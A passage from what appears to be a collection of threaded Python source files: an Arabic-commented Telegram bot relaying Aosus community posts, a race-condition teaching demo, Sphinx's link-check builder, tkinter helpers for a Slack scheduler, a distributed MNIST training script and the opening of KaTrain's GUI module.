str: html نص نظيف لايحتوي على تاقات ال
"""
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html)
return cleantext
def get_last_text():
""" ارجاع نص اخر موضوع
المخرجات:
str: نص اخر موضوع
"""
feed = get_latest_news()
title = feed['title']
author = feed['author']
tag = feed['tags'][0]['term']
summary = cleanhtml( feed['summary']).strip()
split_summary = summary.split()
# picture_name@4x5444×3062 64.6 KB مسح اسم الصور مثل هذا
if '@' in split_summary[0] and '×' in split_summary[0]:
summary = ' '.join(split_summary[3:])
else:
pass
# جلب اخر كلمة كاملة
summary = summary[:summary.strip('\n').find(' ', 55)]+'...'
link = feed['link']
text = f"من {author} \n\n <b><a href='{link}'>{title}</a></b> \n\n <code>{summary}</code> \n\nالقسم:{tag}"
return text
def add_replies(key:str, value:str):
""" اضافة رد الى قاعدة البيانات
المتغيرات:
key (str): الامر لاستدعاء الرد
value (str): الرد
"""
key = str(key).replace('\n', '<br>')
value = str(value).replace('\n', '<br>')
key = key if key.startswith('/') else '/'+key
insert('replies', (key, value))
def del_replies(word: str):
""" مسح رد من قاعدة البيانات
المتغيرات:
word (str): الكلمة الذي تشير الى الرد
"""
del_row("replies", "key", word)
def update_replies(word: str, new_val: str):
""" تعديل على محتوى الرد
المتغيرات:
word (str): الكلمة التي تشير الى الرد المراد تعديله
new_val (str): القيمة الجديدة للرد
"""
update("replies", 'value', str(new_val).replace('\n', '<br>'), 'key', word)
def get_replies(word: str = None):
""" جلب الرد من قاعدة البيانات
المتغيرات:
word (str): الكلمة التي تشير الى الرد
"""
if word:
return str(row("replies", 'key', word, 'value')).replace('<br>', '\n')
else:
return get_column("replies", 'key')
def replie(word: str, status: str, rep: str = None):
""" دالة لادارة جدول الردور
المتغيرات:
word (str): الكلمة التي تشير الى الرد
status (str): الحالة ["add", "del", "update"] or 1, 2, 3
rep (str, optional): الرد الخاص بالكلمة. Defaults to None.
Raises:
ValueError: قيمة خاطئة للحالة
"""
status_cases = ["add", "del", "update", 1, 2, 3]
find_word = any(map(lambda w: w == word,
get_replies()))
if status in status_cases:
if status in ["add", 1]:
if find_word:
return False
else:
add_replies(word, rep)
return True
elif status in ["del", 2]:
if not find_word:
return False
else:
del_replies(word)
return True
else:
if not find_word:
return False
else:
update_replies(word, rep)
return True
else:
raise ValueError("Invalid value, status must be {}".format(' or '.join(status_cases)))
def send_to_users():
"""
ارسال الموضوع الى مستخدمين البوت
"""
text = "موضوع جديد على مجتمع اسس "+get_last_text()
for chat_id in get_column('chats', 'id'):
try:
bot.send_message(chat_id, text, parse_mode="HTML")
# في حالة طرد او اغلاق البوت يتم ازالة العضو من قاعدة البيانات
except Exception:
convert_status(chat_id, new_status='off')
def main_loop():
"""
يتم عمل حلقة لانهائية هنا واذ تم العثور على ايدي
موضوع جديد يتم نشره
"""
while True:
# التحقق من وجود اعضاء في قاعدة البيانات
if len(get_column('chats', 'id')) != 0:
feed = get_latest_news()
if feed.id != get_last_id():
add_id(feed.id)
send_to_users()
else:
pass
else:
pass
time.sleep(sleep)
@bot.edited_message_handler(func= lambda msg: msg.text)
@bot.message_handler(content_types=["new_chat_members"])
@bot.message_handler(func=lambda msg: msg.text)
def message_handler(message):
chat_id = message.chat.id
user_id = message.from_user.id
first_name = message.from_user.first_name
msg_id = message.id
is_private_chat = message.chat.type == "private"
is_admin = get_is_admin(chat_id, user_id)
is_superuser = user_id in super_users
reply_text = message.reply_to_message.html_text if message.reply_to_message else None
new_chat_member_id = message.new_chat_members[0].id if message.new_chat_members else None
start_msg = "\nهذا البوت مخصص لارسال اخر المواضيع الخاصة بمجتمع اسس للبرامج الحرة والمفتوحة.\nلتفعيل الاشتراك: /on\nاذا اردت الغاء الاشتراك : /off\n\n\nhttps://aosus.org"
add_replies_help = "لاضافة او تعديل رد\nيمكنك عمل رد على الرسالة بـ 'اضافة/تعديل رد-<اسم الرد>'\nمثال: اضافة/تعديل رد-تجربة\nلاضافة بدون رد 'اضافة/تعديل رد-<الرد>-<محتوى الرد>'\nمثال: اضافة رد-تجربة-هذا الرد للتجربة\n للمسح: مسح رد <اسم الرد>"
if not new_chat_member_id:
# ازالة معرف البوت من الامر ان وجد
text = message.text.replace(bot_username, '').lower()
# النص مقسم
s_text = list(map(str.strip, text.strip('-').split('-')))
if s_text[0].strip() in ['اضافة رد', 'تعديل رد', 'مسح رد'] and is_superuser:
status = ['اضافة رد', 'مسح رد', 'تعديل رد'].index(s_text[0].strip()) + 1
if len(s_text) >= 2:
if len(s_text) == 2 and not reply_text and status != 2: # او مسح رد
bot.reply_to(message, "يوجد خطأ لمعرفة طريقة الاستخدام ارسل \n /help")
else:
word = s_text[1].strip()
rep = s_text[2].strip() if len(s_text) >= 3 else reply_text if reply_text else None
done = replie(word, status, rep)
if done:
bot.reply_to(message, "تم {} الرد بنجاح".format(
s_text[0].split()[0]
))
else:
bot.reply_to(message, "هناك مشكلة، لايمكن {} {} {}".format(
s_text[0].split()[0], word,
"موجود بالفعل" if status == 1 else "ليس موجود",
))
else:
bot.reply_to(message, "يوجد خطأ لمعرفة طريقة الاستخدام ارسل \n /help")
if text.startswith(('/on', '/off')):
if is_private_chat:
# [1:] تعني ازالة الخط المائل او سلاش او علامة القسمة
convert_status(chat_id, new_status=text[1:], msg_id=msg_id)
else:
if is_admin:
# [1:] تعني ازالة الخط المائل او سلاش او علامة القسمة
convert_status(chat_id, new_status=text[1:], msg_id=msg_id)
else:
bot.reply_to(message, "يجب ان تكون ادمن لكي تقوم بهذا الامر")
# امر البداية يعمل في المحادثات الخاصة فقط
elif text.startswith('/start') and is_private_chat:
text = f"اهلا بك <a href='tg://user?id={user_id}'>{first_name}</a>"+start_msg.format(name=first_name, id=user_id)
bot.reply_to(message, text, parse_mode="HTML")
#امر المساعدة يعمل في المحادثة العامة والخاصة
elif text.startswith('/help'):
text = "اهلا بك في خدمة ارسال اخر المواضيع الخاصة بمجتمع اسس للبرامج الحرة والمفتوحة..\nللاشتراك ارسل: /on\nولالغاء الاشتراك ارسل: /off\nلرؤية الردود: الردود\n\n\n"
if is_superuser:
text = text+add_replies_help
else:
text = text+"https://aosus.org"
bot.reply_to(message, text)
#امر اخر موضوع يعمل في المحادثة العامة والخاصة
elif text.startswith('/last_topic'):
if is_admin:
bot.reply_to(message, get_last_text(), parse_mode="HTML")
else:
bot.reply_to(message, "يجب ان تكون ادمن لكي تقوم بهذا الامر")
else:
if text == 'الردود':
if len(get_replies()) != 0:
text = telebot.util.smart_split('\n'.join(get_replies()), 3000)
for t in text:
bot.reply_to(message,t)
else:
bot.reply_to(message, "لايوجد ردود في البوت")
elif text in get_replies():
bot.reply_to(message, get_replies(text), parse_mode="HTML")
else:
# اذا كان اخر عضو هو البوت
if new_chat_member_id == bot_id:
text = f"شكرا <a href='tg://user?id={user_id}'>{first_name}</a> لاضافتي الى المحادثة 🌹\n{start_msg.format(name=first_name, id=user_id)}"
bot.send_message(chat_id, text, parse_mode="HTML")
else:
pass
# تشغيل البوت
threading.Thread(target=main_loop).start()
while True:
print(f"Start {bot.get_me().first_name}")
try:
bot.polling(none_stop=True, interval=0, timeout=0)
except Exception as err:
print(err)
time.sleep(10)
|
counter_race.py
|
import time
import random
import threading
COUNTER = 0
def update():
global COUNTER
read_value = COUNTER # reading in the shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
COUNTER = read_value + 1
if __name__ == '__main__':
threads = [threading.Thread(target=update) for _ in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
print(f'Final counter value: {COUNTER}')
|
linkcheck.py
|
# -*- coding: utf-8 -*-
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import socket
import threading
from os import path
from docutils import nodes
from requests.exceptions import HTTPError
from six.moves import queue, html_parser
from six.moves.urllib.parse import unquote
# 2015-06-25 barry@python.org. This exception was deprecated in Python 3.3 and
# removed in Python 3.5, however for backward compatibility reasons, we're not
# going to just remove it. If it doesn't exist, define an exception that will
# never be caught but leaves the code in check_anchor() intact.
try:
from six.moves.html_parser import HTMLParseError # type: ignore
except ImportError:
class HTMLParseError(Exception): # type: ignore
pass
from sphinx.builders import Builder
from sphinx.locale import __
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, darkred, turquoise
)
from sphinx.util.requests import is_ssl_error
if False:
# For type annotation
from typing import Any, Dict, List, Set, Tuple, Union # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.util.requests.requests import Response # NOQA
logger = logging.getLogger(__name__)
class AnchorCheckParser(html_parser.HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor):
# type: (unicode) -> None
html_parser.HTMLParser.__init__(self)
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag, attrs):
# type: (Any, Any) -> None
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response, anchor):
# type: (Response, unicode) -> bool
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
try:
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
parser.feed(chunk)
if parser.found:
break
parser.close()
except HTMLParseError:
# HTMLParser is usually pretty good with sloppy HTML, but it tends to
# choke on EOF. But we're done then anyway.
pass
return parser.found
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
epilog = __('Look for any errors in the above output or in '
'%(outdir)s/output.txt')
def init(self):
# type: () -> None
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.good = set() # type: Set[unicode]
self.broken = {} # type: Dict[unicode, unicode]
self.redirected = {} # type: Dict[unicode, Tuple[unicode, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self):
# type: () -> None
kwargs = {
'allow_redirects': True,
'headers': {
'Accept': 'text/html,application/xhtml+xml;q=0.9,*/*;q=0.8'
},
}
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
def check_uri():
# type: () -> Tuple[unicode, unicode, int]
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception(__("Anchor '%s' not found") % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config, **kwargs)
response.raise_for_status()
except HTTPError:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check():
# type: () -> Tuple[unicode, unicode, int]
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:', 'ftp:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
return 'local', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result):
# type: (Tuple[unicode, unicode, int, unicode, unicode, int]) -> None
uri, docname, lineno, status, info, code = result
if status == 'unchecked':
return
if status == 'working' and info == 'old':
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=1)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, lineno, uri)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
elif status == 'broken':
self.write_entry('broken', docname, lineno, uri + ': ' + info)
if self.app.quiet or self.app.warningiserror:
logger.warning(__('broken link: %s (%s)'), uri, info,
location=(self.env.doc2path(docname), lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
elif status == 'redirected':
text, color = {
301: ('permanently', darkred),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
0: ('with unknown code', purple),
}[code]
self.write_entry('redirected ' + text, docname, lineno,
uri + ' to ' + info)
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
def get_target_uri(self, docname, typ=None):
# type: (unicode, unicode) -> unicode
return ''
def get_outdated_docs(self):
# type: () -> Set[unicode]
return self.env.found_docs
def prepare_writing(self, docnames):
# type: (nodes.Node) -> None
return
def write_doc(self, docname, doctree):
# type: (unicode, nodes.Node) -> None
logger.info('')
n = 0
for node in doctree.traverse(nodes.reference):
if 'refuri' not in node:
continue
uri = node['refuri']
lineno = None
while lineno is None:
node = node.parent
if node is None:
break
lineno = node.line
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what, docname, line, uri):
# type: (unicode, unicode, int, unicode) -> None
with open(path.join(self.outdir, 'output.txt'), 'a', # type: ignore
encoding='utf-8') as output:
output.write("%s:%s: [%s] %s\n" % (self.env.doc2path(docname, None),
line, what, uri))
def finish(self):
# type: () -> None
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
gui_tools.py
|
import tkinter as tk
import schedule
import time
import queue
import threading
from slack_app.slack_message import *
class CheckBar(tk.Frame):
def __init__(self, options_list, parent=None, side=tk.TOP, anchor=tk.W):
tk.Frame.__init__(self, parent)
self.vars = list()
for opt in options_list:
var = tk.IntVar()
chk = tk.Checkbutton(self, text=opt, variable=var)
chk.pack(side=side, anchor=anchor)
self.vars.append(var)
def state(self):
return map((lambda var: var.get()), self.vars)
def center(win):
"""
centers a tkinter window
:param win: the root or Toplevel window to center
"""
win.update_idletasks()
width = win.winfo_width()
frm_width = win.winfo_rootx() - win.winfo_x()
win_width = width + 2 * frm_width
height = win.winfo_height()
titlebar_height = win.winfo_rooty() - win.winfo_y()
win_height = height + titlebar_height + frm_width
x = win.winfo_screenwidth() // 2 - win_width // 2
y = win.winfo_screenheight() // 2 - win_height // 2
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
win.deiconify()
def include_greetings():
def user_click(button_id):
nonlocal u_selection
nonlocal root
if button_id == 'cancel':
u_selection = 'cancel'
root.destroy()
u_selection = 'submit'
root = tk.Tk()
root.attributes("-topmost", True)
root.title("Greetings App")
winroot = tk.Frame(root)
winroot.pack(side="top", fill="both", expand=True)
tk.Label(winroot, text="COMPLETE AND SELECT THE OPTIONS"). \
pack(pady=(1, 10), padx=(4, 4))
# Channel
selected_channel = tk.StringVar(winroot)
tk.Label(winroot, text="Channel (include '#' or '@')").pack()
tk.Entry(winroot, textvariable=selected_channel).pack(pady=(1, 5))
# Message
selected_message = tk.StringVar(winroot)
tk.Label(winroot, text="Message").pack()
tk.Entry(winroot, textvariable=selected_message).pack(pady=(1, 5))
# Time request
selected_time = tk.StringVar(winroot)
tk.Label(winroot, text="Time of the Day (hh:mm)").pack()
tk.Entry(winroot, textvariable=selected_time).pack(pady=(1, 5))
# Days of the week
weekdays = [
"Monday", "Tuesday", "Wednesday", "Thursday",
"Friday", "Saturday", "Sunday"
]
tk.Label(winroot, text="Weekdays to send the message").pack()
cb = CheckBar(weekdays, winroot)
cb.pack()
tk.Button(winroot, text="Cancel", command=lambda: user_click('cancel')). \
pack(side=tk.LEFT)
tk.Button(winroot, text="Submit", command=lambda: user_click('submit')).\
pack(side=tk.RIGHT)
center(root)
winroot.mainloop()
return (u_selection,
selected_channel.get(),
selected_message.get(),
selected_time.get(),
[day for (day, state) in zip(weekdays, list(cb.state())) if state == 1])
def info_message(message):
winroot = tk.Tk()
winroot.geometry("300x200")
winroot.attributes("-topmost", True)
winroot.title("Info")
tk.Label(winroot, text=message).pack()
tk.Button(winroot, text='OK', command=winroot.destroy).pack(side=tk.BOTTOM)
center(winroot)
winroot.mainloop()
class GuiPart(object):
def __init__(self, master, queue, end_command):
self.queue = queue
# Set up the GUI
tk.Button(master, text='Stop', command=end_command).pack(side=tk.BOTTOM)
# Add more GUI stuff here depending on your specific needs
def processIncoming(self):
""" Handle all messages currently in the queue, if any. """
while self.queue.qsize():
try:
msg = self.queue.get_nowait()
# Check contents of message and do whatever is needed. As a
# simple example, let's print it (in real life, you would
# suitably update the GUI's display in a richer fashion).
print(msg)
except queue.Empty:
# just on general principles, although we don't expect this
# branch to be taken in this case, ignore this exception!
pass
class ThreadedJob(object):
"""
Launch the main part of the GUI and the worker thread. periodic_call()
and end_application() could reside in the GUI part, but putting them
here means that you have all the thread controls in a single place.
"""
def __init__(self, master):
"""
Start the GUI and the asynchronous threads. We are in the main
(original) thread of the application, which will later be used by
the GUI as well. We spawn a new thread for the worker (I/O).
"""
self.master = master
# Create the queue
self.queue = queue.Queue()
# Set up the GUI part
self.gui = GuiPart(master, self.queue, self.end_application)
# Set up the thread to do asynchronous I/O
# More threads can also be created and used, if necessary
self.running = True
self.thread1 = threading.Thread(target=self.worker_thread1)
self.thread1.start()
# Start the periodic call in the GUI to check the queue
self.periodic_call()
def periodic_call(self):
""" Check every 200 ms if there is something new in the queue. """
self.master.after(200, self.periodic_call)
self.gui.processIncoming()
if not self.running:
# This is the brutal stop of the system. You may want to do
# some cleanup before actually shutting it down.
import sys
sys.exit(1)
def worker_thread1(self):
"""
This is where we handle the asynchronous I/O. For example, it may be
a 'select()'. One important thing to remember is that the thread has
to yield control pretty regularly, be it by select or otherwise.
"""
while self.running:
# Execute jobs until stopped
#time.sleep(rand.random() * 1.5)
#msg = rand.random()
schedule.run_pending()
time.sleep(1)
#self.queue.put(msg)
def end_application(self):
self.running = False # Stops worker_thread1 (invoked by "Done" button).
|
mnist_lr_grad_avg.py
|
import argparse
import os
import sys
import torch
import torch.distributed as dist
import torch.optim as optim
from math import ceil
from torch.multiprocessing import Process
sys.path.append("../")
from archived.ec2.trainer import Trainer
from archived.ec2 import partition_mnist
from archived.pytorch_model import LogisticRegression
def dist_is_initialized():
if dist.is_available():
if dist.is_initialized():
return True
return False
def run(args):
""" Distributed Synchronous SGD Example """
device = torch.device('cuda' if torch.cuda.is_available() and not args.no_cuda else 'cpu')
torch.manual_seed(1234)
train_loader, bsz, test_loader = partition_mnist(args.batch_size, args.root, download=False)
num_batches = ceil(len(train_loader.dataset) / float(bsz))
model = LogisticRegression()
optimizer = optim.SGD(model.parameters(), lr=args.learning_rate, momentum=0.9)
trainer = Trainer(model, optimizer, train_loader, test_loader, device)
trainer.fit(args.epochs, is_dist=dist_is_initialized())
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def run_local():
size = 2
processes = []
for rank in range(size):
p = Process(target=init_processes, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--backend', type=str, default='gloo', help='Name of the backend to use.')
parser.add_argument(
'-i',
'--init-method',
type=str,
default='tcp://127.0.0.1:23456',
help='URL specifying how to initialize the package.')
parser.add_argument('-s', '--world-size', type=int, default=1, help='Number of processes participating in the job.')
parser.add_argument('-r', '--rank', type=int, default=0, help='Rank of the current process.')
parser.add_argument('--epochs', type=int, default=20)
parser.add_argument('--no-cuda', action='store_true')
parser.add_argument('-lr', '--learning-rate', type=float, default=1e-3)
parser.add_argument('--root', type=str, default='data')
parser.add_argument('--batch-size', type=int, default=128)
args = parser.parse_args()
print(args)
if args.world_size > 1:
dist.init_process_group(backend=args.backend, init_method=args.init_method, world_size=args.world_size, rank=args.rank)
run(args)
if __name__ == '__main__':
main()
|
__main__.py
|
"""isort:skip_file"""
# first, logging level lower
import os
os.environ["KCFG_KIVY_LOG_LEVEL"] = os.environ.get("KCFG_KIVY_LOG_LEVEL", "warning")
if "KIVY_AUDIO" not in os.environ:
os.environ["KIVY_AUDIO"] = "sdl2" # some backends hard crash / this seems to be most stable
# next, icon
from katrain.core.utils import find_package_resource, PATHS
from kivy.config import Config
from kivy.utils import platform
ICON = find_package_resource("katrain/img/icon.ico")
Config.set("kivy", "window_icon", ICON)
# finally, window size
WINDOW_SCALE_FAC, WINDOW_X, WINDOW_Y = 1, 1300, 1000
try:
from screeninfo import get_monitors
for m in get_monitors():
WINDOW_SCALE_FAC = min(WINDOW_SCALE_FAC, (m.height - 100) / WINDOW_Y, (m.width - 100) / WINDOW_X)
except Exception as e:
if platform != "macosx":
print(f"Exception {e} while getting screen resolution.")
WINDOW_SCALE_FAC = 0.85
Config.set("graphics", "width", max(400, int(WINDOW_X * WINDOW_SCALE_FAC)))
Config.set("graphics", "height", max(400, int(WINDOW_Y * WINDOW_SCALE_FAC)))
Config.set("input", "mouse", "mouse,multitouch_on_demand")
import re
import signal
import sys
import threading
import traceback
from queue import Queue
import urllib3
import webbrowser
from kivy.base import ExceptionHandler, ExceptionManager
from kivy.app import App
from kivy.core.clipboard import Clipboard
from kivy.lang import Builder
from kivy.resources import resource_add_path
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import Screen
from katrain.core.ai import generate_ai_move
from kivy.core.window import Window
from kivy.metrics import dp
from katrain.core.lang import DEFAULT_LANGUAGE, i18n
from katrain.core.constants import (
OUTPUT_ERROR,
OUTPUT_KATAGO_STDERR,
OUTPUT_INFO,
OUTPUT_DEBUG,
OUTPUT_EXTRA_DEBUG,
MODE_PLAY,
MODE_ANALYZE,
HOMEPAGE,
VERSION,
STATUS_ERROR,
STATUS_INFO,
PLAYING_NORMAL,
PLAYER_HUMAN,
)
from katrain.gui.popups import ConfigTeacherPopup, ConfigTimerPopup, I18NPopup
from katrain.core.base_katrain import KaTrainBase
from katrain.core.engine import KataGoEngine
from katrain.core.game import Game, IllegalMoveException, KaTrainSGF
from katrain.core.sgf_parser import Move, ParseError
from katrain.gui.kivyutils import *
from katrain.gui.popups import ConfigPopup, LoadSGFPopup, NewGamePopup, ConfigAIPopup
from katrain.gui.style import ENGINE_BUSY_COL, ENGINE_DOWN_COL, ENGINE_READY_COL, LIGHTGREY
from katrain.gui.widgets import *
from katrain.gui.badukpan import AnalysisControls, BadukPanControls, BadukPanWidget
from katrain.gui.controlspanel import ControlsPanel
class KaTrainGui(Screen, KaTrainBase):
"""Top level class responsible for tying everything together"""
zen = NumericProperty(0)
controls = ObjectProperty(None)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.engine = None
self.new_game_popup = None
self.fileselect_popup = None
self.config_popup = None
self.ai_settings_popup = None
self.teacher_settings_popup = None
self.timer_settings_popup = None
self.idle_analysis = False
self.message_queue = Queue()
self._keyboard = Window.request_keyboard(None, self, "")
self._keyboard.bind(on_key_down=self._on_keyboard_down)
Clock.schedule_interval(self.animate_pondering, 0.1)
def log(self, message, level=OUTPUT_INFO):
super().log(message, level)
if level == OUTPUT_KATAGO_STDERR and "ERROR" not in self.controls.status.text:
if "starting" in message.lower():
self.controls.set_status(f"KataGo engine starting...", STATUS_INFO)
if message.startswith("Tuning"):
self.controls.set_status(
f"KataGo is tuning settings for first startup, please wait." + message, STATUS_INFO
)
return
if "ready" in message.lower():
self.controls.set_status(f"KataGo engine ready.", STATUS_INFO)
if (
level == OUTPUT_ERROR
or (level == OUTPUT_KATAGO_STDERR and "error" in message.lower() and "tuning" not in message.lower())
) and getattr(self, "controls", None):
self.controls.set_status(f"ERROR: {message}", STATUS_ERROR)
def animate_pondering(self, *_args):
if not self.idle_analysis:
self.board_controls.engine_status_pondering = -1
else:
self.board_controls.engine_status_pondering += 5
@property
def play_analyze_mode(self):
return self.play_mode.mode
def toggle_continuous_analysis(self):
if self.idle_analysis:
self.controls.set_status("", STATUS_INFO)
self.idle_analysis = not self.idle_analysis
self.update_state()
def start(self):
if self.engine:
return
self.board_gui.trainer_config = self.config("trainer")
self.engine = KataGoEngine(self, self.config("engine"))
threading.Thread(target=self._message_loop_thread, daemon=True).start()
self._do_new_game()
def update_gui(self, cn, redraw_board=False):
# Handle prisoners and next player display
prisoners = self.game.prisoner_count
top, bot = [w.__self__ for w in self.board_controls.circles] # no weakref
if self.next_player_info.player == "W":
top, bot = bot, top
self.controls.players["W"].active = True
self.controls.players["B"].active = False
else:
self.controls.players["W"].active = False
self.controls.players["B"].active = True
self.board_controls.mid_circles_container.clear_widgets()
self.board_controls.mid_circles_container.add_widget(bot)
self.board_controls.mid_circles_container.add_widget(top)
self.controls.players["W"].captures = prisoners["W"]
self.controls.players["B"].captures = prisoners["B"]
# update engine status dot
if not self.engine or not self.engine.katago_process or self.engine.katago_process.poll() is not None:
self.board_controls.engine_status_col = ENGINE_DOWN_COL
elif len(self.engine.queries) == 0:
self.board_controls.engine_status_col = ENGINE_READY_COL
else:
self.board_controls.engine_status_col = ENGINE_BUSY_COL
self.board_controls.queries_remaining = len(self.engine.queries)
# redraw board/stones
if redraw_board:
self.board_gui.draw_board()
self.board_gui.redraw_board_contents_trigger()
self.controls.update_evaluation()
self.controls.update_timer(1)
# update move tree
self.controls.move_tree.current_node = self.game.current_node
def update_state(self, redraw_board=False): # redirect to message queue thread
self("update_state", redraw_board=redraw_board)
def _do_update_state(
self, redraw_board=False
): # is called after every message and on receiving analyses and config changes
# AI and Trainer/auto-undo handlers
if not self.game or not self.game.current_node:
return
cn = self.game.current_node
last_player, next_player = self.players_info[cn.player], self.players_info[cn.next_player]
if self.play_analyze_mode == MODE_PLAY and self.nav_drawer.state != "open" and self.popup_open is None:
teaching_undo = cn.player and last_player.being_taught and cn.parent
if (
teaching_undo
and cn.analysis_complete
and cn.parent.analysis_complete
and not cn.children
and not self.game.end_result
):
self.game.analyze_undo(cn) # not via message loop
if (
cn.analysis_complete
and next_player.ai
and not cn.children
and not self.game.end_result
and not (teaching_undo and cn.auto_undo is None)
): # cn mismatch stops this if undo fired. avoid message loop here or fires repeatedly.
self._do_ai_move(cn)
Clock.schedule_once(self.board_gui.play_stone_sound, 0.25)
if len(self.engine.queries) == 0 and self.idle_analysis:
self("analyze-extra", "extra", continuous=True)
Clock.schedule_once(lambda _dt: self.update_gui(cn, redraw_board=redraw_board), -1) # trigger?
def update_player(self, bw, **kwargs):
super().update_player(bw, **kwargs)
if self.controls:
self.controls.update_players()
self.update_state()
for player_setup_block in PlayerSetupBlock.INSTANCES:
player_setup_block.update_player_info(bw, self.players_info[bw])
def set_note(self, note):
self.game.current_node.note = note
def _message_loop_thread(self):
while True:
game, msg, args, kwargs = self.message_queue.get()
try:
self.log(f"Message Loop Received {msg}: {args} for Game {game}", OUTPUT_EXTRA_DEBUG)
if game != self.game.game_id:
self.log(
f"Message skipped as it is outdated (current game is {self.game.game_id}", OUTPUT_EXTRA_DEBUG
)
continue
fn = getattr(self, f"_do_{msg.replace('-','_')}")
fn(*args, **kwargs)
if msg != "update_state":
self._do_update_state()
except Exception as exc:
self.log(f"Exception in processing message {msg} {args}: {exc}", OUTPUT_ERROR)
traceback.print_exc()
def __call__(self, message, *args, **kwargs):
if self.game:
if message.endswith("popup"): # gui code needs to run in main kivy thread.
fn = getattr(self, f"_do_{message.replace('-', '_')}")
Clock.schedule_once(lambda _dt: fn(*args, **kwargs), -1)
else: # game related actions
self.message_queue.put([self.game.game_id, message, args, kwargs])
def _do_new_game(self, move_tree=None, analyze_fast=False):
self.idle_analysis = False
